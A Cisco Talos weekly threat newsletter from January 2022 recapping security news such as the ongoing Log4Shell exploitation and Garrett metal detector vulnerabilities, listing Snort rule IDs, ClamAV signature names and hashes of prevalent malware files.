Threat Source Newsletter (Jan. 6, 2022)

Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers.  

We hope everyone had some well-deserved, relaxing time off over the holidays. Unfortunately, we are all back now and Log4j is still an issue.

And even though it seems like Log4j has already been in the news for a year, it's actually only been a few weeks. There were several other stories worth taking a look back in 2021, from the fallout of SolarWinds to the Kaseya supply chain attack. Take a look back with us to see what we can learn from the past year with our Year in Review.

We also released a new video walkthrough, which you can watch above, that covers how to safely and securely set up a new IoT assistant. Many of you may have received a new Google Home or Alexa smart device. And while these devices certainly come with inherent cybersecurity risks, there are many ways to set them up with privacy settings to keep you secure. Follow along with me and leave any feedback in the comments you have about what settings you use with your IoT devices.

Cybersecurity week in review

• The Log4Shell exploit in Log4j continues to be top-of-mind for defenders across the globe heading into 2022. Everyone from state-sponsored actors to the average cybercriminal is using this exploit in the wild to carry out hands-on keyboard attacks and drop remote shells on targeted machines.
• The U.S. Federal Trade Commission is warning it could take legal action against companies that don't appropriately patch for Log4j. The agency said in a statement the vulnerability poses a “severe risk to millions of consumer products to enterprise software and web applications.”
• Google released a security update for its Chrome browser, fixing 37 vulnerabilities. Chrome 97.0.4692.71 includes a patch for one critical use-after-free vulnerability identified as CVE-2022-0096.
• A New York State investigation found that 1.1 million accounts have been compromised as part of credential-stuffing attacks affecting 17 companies. The State's Attorney General said the companies are “well-known online retailers, restaurant chains and food delivery services."
• Missouri's governor is still planning to pursue legal action against a local reporter who reported a security vulnerability in the state's education department website. The reporter viewed the source code of the page in a browser, revealing an issue that left sensitive information unprotected.
• The U.S. Cybersecurity and Infrastructure Security Agency is establishing a network of cybersecurity liaisons in each state. The federal representatives will help states establish cybersecurity policies and plans, test them and help them apply for federal grants. 
• A coding error in Microsoft Exchange Server shut down on-premise email delivery briefly to kick off the year. Exchange Server did not properly accommodate the year 2022 in dates, leading some to jokingly refer to the issue as "Y2K22."
• Some medical licenses in Maryland are being delayed after a December cyber attack on the state's Department of Health website. Some first-time applicants had to delay start dates at new jobs by weeks waiting for the appropriate approvals.
• Attackers are exploiting a vulnerability in Google Docs' commenting feature to send phishing links to Microsoft Outlook users. By using the comments as the attack vector, it makes it easier for the links to slip through email filters and scanners.

Notable recent security issues

Log4j continues to haunt defenders even after holiday break 

A critical vulnerability in Log4j is still under active exploitation weeks after it was initially disclosed. Microsoft released a warning this week that its customers are still seeing state-sponsored actors and cyber criminals target the widely used library. The vulnerability could allow an attacker to completely take over an affected server. Log4Shell, the nickname given to this vulnerability, will likely take years to remediate because of how widely the software component is used in applications and services. It can be leveraged in default configurations by an unauthenticated remote attacker to target applications that make use of the Log4j library. This vulnerability, tracked as CVE-2021-44228, received a CVSS severity score of a maximum 10.0, and is widely believed to be easy to exploit. This library may also be used as a dependency by a variety of web applications found in enterprise environments, including Elastic. Due to the nature of this vulnerability, Cisco Talos believes this will be a widely exploited vulnerability among attackers moving forward, and users should patch affected products and implement mitigation solutions as soon as possible. 

Snort SIDs: 58722 - 58744, 58751, 58784 - 58790, 58795, 58801 and 58811-58814 

Snort 3 SIDs: 300055 - 300058 

ClamAV signatures: 

• Java.Exploit.CVE_2021_44228-9914600-1 
• Java.Exploit.CVE_2021_44228-9914601-1 
• Java.Exploit.CVE_2021_44228-9914600-2 
• Java.Exploit.CVE_2021_44228-9914601-4 
• Java.Exploit.CVE_2021_44228-9915330-0 
• Java.Malware.CVE_2021_44228-9915820-0 
• Java.Malware.CVE_2021_44228-9915819-0 
• Java.Malware.CVE_2021_44228-9915818-0 
• Java.Malware.CVE_2021_44228-9915817-0 
• Java.Malware.CVE_2021_44228-9915816-0 
• Java.Malware.CVE_2021_44228-9915813-0 
• Java.Malware.CVE_2021_44228-9915812-0 
• PUA.Java.Tool.CVE_2021_44228-9916978-0 

 

Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices 

Cisco Talos recently discovered multiple vulnerabilities in a device from Garrett Metal Detectors that could allow remote attackers to bypass authentication requirements, manipulate metal detector configurations, and even execute arbitrary code on the device.  The vulnerabilities specifically exist in the Garrett iC module, which provides network connectivity to the Garrett PD 6500i or Garrett MZ 6100 walk-through metal detectors commonly used at security checkpoints. An attacker could manipulate this module to remotely monitor statistics on the metal detector, such as whether the alarm has been triggered or how many visitors have walked through. They could also make configuration changes, such as altering the sensitivity level of a device, which potentially poses a security risk to users who rely on these metal detectors. 

Snort SIDs: 58013 - 58017 

Most prevalent malware files this week

SHA 256: 1b259d8ca9bb4579feb56748082a32239a433cea619c09f827fd6df805707f37 

MD5: a5e345518e6817f72c9b409915741689 

Typical Filename: swupdater.exe 

Claimed Product: Wavesor SWUpdater 

Detection Name: W32.1B259D8CA9.Wavesor.SSO.Talos 

SHA 256: 8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9  

MD5: 34560233e751b7e95f155b6f61e7419a  

Typical Filename: SAntivirusService.exe  

Claimed Product: A n t i v i r u s S e r v i c e  

Detection Name: PUA.Win.Dropper.Segurazo::tpd 

SHA 256: 0fa5cf65905b79ede6fe39e9ee8a8a8b2d04b71b859fe6e7a0ee583a7b832f43 

MD5: cbd421ed5799f498e42ec6c598dc0aef  

Typical Filename: N/A 

Claimed Product: N/A  

Detection Name: W32.Auto:0fa5cf6590.in03.Talos 

SHA 256: 8639fd3ef8d55c45808f2fa8a5b398b0de18e5dd57af00265e42c822fb6938e2 

MD5: fe3659119e683e1aa07b2346c1f215af 

Typical Filename: SqlServerWorks.Runner.exe 

Claimed Product: SqlServerWorks.Runner 

Detection Name: W32.8639FD3EF8-95.SBX.TG 

 

SHA 256: d339e195ca0b74746b02a4ee1a5820fa3074f43bec2988737005d2562a90cd34 

MD5: 3f75eb823cd1a73e4c89185fca77cb38 

Typical Filename: signup.png 

Claimed Product: N/A 

Detection Name: Win.Dropper.Generic::231945.in02 

Keep up with all things Talos by following us on Twitter. Snort, and ClamAV also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here and Talos Takes here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.